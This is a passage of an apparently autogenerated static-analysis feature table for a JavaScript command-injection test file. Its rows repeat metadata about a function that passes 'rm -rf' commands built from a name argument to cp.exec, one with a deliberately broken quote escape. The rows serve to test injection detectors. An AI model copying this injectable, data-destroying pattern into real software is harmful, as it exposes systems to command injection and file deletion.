autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:179:10:179:30 | "rm -rf ... nitized | enclosingFunctionBody | name sanitized ' name replace /'/g '\\'' ' cp exec rm -rf sanitized broken ' name replace /'/g ''' ' cp exec rm -rf broken | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:179:10:179:30 | "rm -rf ... nitized | enclosingFunctionName | sanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:179:10:179:30 | "rm -rf ... nitized | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:179:10:179:30 | "rm -rf ... nitized | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:179:22:179:30 | sanitized | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:179:22:179:30 | sanitized | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:179:22:179:30 | sanitized | enclosingFunctionBody | name sanitized ' name replace /'/g '\\'' ' cp exec rm -rf sanitized broken ' name replace /'/g ''' ' cp exec rm -rf broken | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:179:22:179:30 | sanitized | enclosingFunctionName | sanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:179:22:179:30 | sanitized | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:179:22:179:30 | sanitized | stringConcatenatedWith | 'rm -rf ' -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:181:6:181:11 | broken | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:181:6:181:11 | broken | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:181:6:181:11 | broken | enclosingFunctionBody | name sanitized ' name replace /'/g '\\'' ' cp exec rm -rf sanitized broken ' name replace /'/g ''' ' cp exec rm -rf broken | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:181:6:181:11 | broken | enclosingFunctionName | sanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:181:6:181:11 | broken | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:181:6:181:52 | broken | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:181:6:181:52 | broken | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:181:6:181:52 | broken | enclosingFunctionBody | name sanitized ' name replace /'/g '\\'' ' cp exec rm -rf sanitized broken ' name replace /'/g ''' ' cp exec rm -rf broken | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:181:6:181:52 | broken | enclosingFunctionName | sanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:181:6:181:52 | broken | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:181:6:181:52 | broken ... ) + "'" | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:181:6:181:52 | broken ... ) + "'" | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:181:6:181:52 | broken ... ) + "'" | enclosingFunctionBody | name sanitized ' name replace /'/g '\\'' ' cp exec rm -rf sanitized broken ' name replace /'/g ''' ' cp exec rm -rf broken | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:181:6:181:52 | broken ... ) + "'" | enclosingFunctionName | sanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:181:6:181:52 | broken ... ) + "'" | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:181:15:181:17 | "'" | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:181:15:181:17 | "'" | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:181:15:181:17 | "'" | enclosingFunctionBody | name sanitized ' name replace /'/g '\\'' ' cp exec rm -rf sanitized broken ' name replace /'/g ''' ' cp exec rm -rf broken | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:181:15:181:17 | "'" | enclosingFunctionName | sanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:181:15:181:17 | "'" | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:181:15:181:17 | "'" | stringConcatenatedWith | -endpoint- name.replace() + ''' | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:181:15:181:46 | "'" + n ... "'\\''") | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:181:15:181:46 | "'" + n ... "'\\''") | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:181:15:181:46 | "'" + n ... "'\\''") | enclosingFunctionBody | name sanitized ' name replace /'/g '\\'' ' cp exec rm -rf sanitized broken ' name replace /'/g ''' ' cp exec rm -rf broken | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:181:15:181:46 | "'" + n ... "'\\''") | enclosingFunctionName | sanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:181:15:181:46 | "'" + n ... "'\\''") | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:181:15:181:52 | "'" + n ... ) + "'" | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:181:15:181:52 | "'" + n ... ) + "'" | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:181:15:181:52 | "'" + n ... ) + "'" | enclosingFunctionBody | name sanitized ' name replace /'/g '\\'' ' cp exec rm -rf sanitized broken ' name replace /'/g ''' ' cp exec rm -rf broken | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:181:15:181:52 | "'" + n ... ) + "'" | enclosingFunctionName | sanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:181:15:181:52 | "'" + n ... ) + "'" | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:181:21:181:24 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:181:21:181:24 | name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:181:21:181:24 | name | enclosingFunctionBody | name sanitized ' name replace /'/g '\\'' ' cp exec rm -rf sanitized broken ' name replace /'/g ''' ' cp exec rm -rf broken | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:181:21:181:24 | name | enclosingFunctionName | sanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:181:21:181:24 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:181:21:181:32 | name.replace | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:181:21:181:32 | name.replace | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:181:21:181:32 | name.replace | enclosingFunctionBody | name sanitized ' name replace /'/g '\\'' ' cp exec rm -rf sanitized broken ' name replace /'/g ''' ' cp exec rm -rf broken | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:181:21:181:32 | name.replace | enclosingFunctionName | sanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:181:21:181:32 | name.replace | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:181:21:181:46 | exceptional return of name.re ... "'\\''") | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:181:21:181:46 | exceptional return of name.re ... "'\\''") | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:181:21:181:46 | exceptional return of name.re ... "'\\''") | enclosingFunctionBody | name sanitized ' name replace /'/g '\\'' ' cp exec rm -rf sanitized broken ' name replace /'/g ''' ' cp exec rm -rf broken | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:181:21:181:46 | exceptional return of name.re ... "'\\''") | enclosingFunctionName | sanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:181:21:181:46 | exceptional return of name.re ... "'\\''") | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:181:21:181:46 | name.re ... "'\\''") | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:181:21:181:46 | name.re ... "'\\''") | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:181:21:181:46 | name.re ... "'\\''") | enclosingFunctionBody | name sanitized ' name replace /'/g '\\'' ' cp exec rm -rf sanitized broken ' name replace /'/g ''' ' cp exec rm -rf broken | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:181:21:181:46 | name.re ... "'\\''") | enclosingFunctionName | sanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:181:21:181:46 | name.re ... "'\\''") | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:181:21:181:46 | name.re ... "'\\''") | stringConcatenatedWith | ''' -endpoint- ''' | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:181:26:181:32 | replace | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:181:26:181:32 | replace | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:181:26:181:32 | replace | enclosingFunctionBody | name sanitized ' name replace /'/g '\\'' ' cp exec rm -rf sanitized broken ' name replace /'/g ''' ' cp exec rm -rf broken | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:181:26:181:32 | replace | enclosingFunctionName | sanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:181:26:181:32 | replace | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:181:34:181:37 | /'/g | CalleeFlexibleAccessPath | name.replace | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:181:34:181:37 | /'/g | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:181:34:181:37 | /'/g | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:181:34:181:37 | /'/g | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:181:34:181:37 | /'/g | enclosingFunctionBody | name sanitized ' name replace /'/g '\\'' ' cp exec rm -rf sanitized broken ' name replace /'/g ''' ' cp exec rm -rf broken | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:181:34:181:37 | /'/g | enclosingFunctionName | sanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:181:34:181:37 | /'/g | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:181:34:181:37 | /'/g | receiverName | name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:181:40:181:45 | "'\\''" | CalleeFlexibleAccessPath | name.replace | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:181:40:181:45 | "'\\''" | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:181:40:181:45 | "'\\''" | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, 